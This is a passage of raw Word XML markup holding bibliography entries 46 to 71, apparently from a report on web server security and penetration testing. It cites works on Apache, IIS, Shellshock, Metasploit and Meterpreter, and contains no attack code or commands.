      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2005.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792B22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[46]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">MySQL, “MySQL 5.7 Reference Manual,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MySQL 5.7 Ref. Man.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D417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[47]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">H. Wu and L. Zhao, “PHP Security,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Web Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2015.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A6834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[48]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">G. Weidman, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Penetration Testing: A Hands-On Introduction to Hacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C077D7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[49]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">C. C. Palmer, “Ethical hacking,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IBM Syst. J.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, vol. 40, no. 3, pp. 769–780, 2001,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10.1147/sj.403.0769.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0664C79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[50]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">K. Yoshioka, Y. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hosobuchi</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Orii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and T. Matsumoto, “Your sandbox is blinded: Impact of decoy injection to public malware analysis systems,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>J. Inf. Process.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 2011,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10.2197/ipsjjip.19.153.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634A071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[51]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Microsoft, “How </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To Set Up</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> an HTTPS Service in IIS,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>microsoft.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017. [Online]. Available: https://support.microsoft.com/en-us/help/324069/how-to-set-up-an-https-service-in-iis. [Accessed: 11-Dec-2017].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FF7E7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lastRenderedPageBreak/>
        <w:t>[52]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">H. Schwichtenberg and H. Schwichtenberg, “Internet Information Services (IIS),” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows PowerShell 5.1 und PowerShell Core 6.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A24A2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[53]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">MITRE, “CVE - Common Vulnerabilities and Exposures,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Common Vulnerabilities Expo.</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10.1016/0272-7757(91)90035-N.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7204A91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[54]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">C. Hunt, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TCP/IP Network Administration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2002.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D7C42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[55]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">A. A. Kamal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kathuria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Chaynika</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kapoor, “Common Gateway Interface,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Int. J. Sci. Res.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8CDC1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[56]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">J. Wagner, F. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lingenfelser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, T. Baur, I. Damian, F. Kistler, and E. André, “The social signal interpretation (SSI) framework: Multimodal signal processing and recognition in real-time,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MM 2013 - Proceedings of the 2013 ACM Multimedia Conference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 2013,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10.1145/2502081.2502223.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E53D7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[57]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>T. Enache, “Shellshock Vulnerability,” 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1674050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[58]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">MITRE, “CVE - CVE-2014-6278,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MITRE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2014. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF1AE9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[59]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Rapid7, “Metasploit Framework,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>metasploit.rapid7.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2018. [Online]. Available: https://metasploit.help.rapid7.com/docs/msf-overview. [Accessed: 23-May-2018].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C4AB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[60]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">D. Flanagan and Y. Matsumoto, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Ruby Programming Language</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2008.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F07DA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[61]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">K. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Wadner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, “An Analysis of Meterpreter during Post-Exploitation,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SANS Institute Information Security Reading Room</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551298A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[62]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Cobalt Security, “What happens when I type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">? | Strategic Cyber LLC,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cobaltstrike.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2014. [Online]. Available: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/. [Accessed: 11-May-2020].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4577868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[63]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">R. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Stacpoole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and T. Jamil, “Cache memories,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IEEE Potentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 2000,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10.1109/45.839642.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156FC70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[64]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">U. university, “Dynamic RAM Overview,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utica.edu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, vol. 1, no. 1, p. 10, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C33FC6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[65]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">L. Sabin-Wilson, “WordPress for Dummies,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Director</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2008.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71682FC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[66]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">World Wide Web Foundation, “History of the Web,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2008. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FEA08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[67]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">M. Grosz, “World wide web consortium,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Handbook of Transnational Economic Governance Regimes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2009.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7760C81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[68]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">M. MacDonald, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTML5: the missing manual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E8CF8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[69]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">R. Steyer and R. Steyer, “JavaScript,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6F533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[70]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">S. V </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tiponut</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Python Network Programming</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2001.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D8AD5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[71]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">A. Beaulieu, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
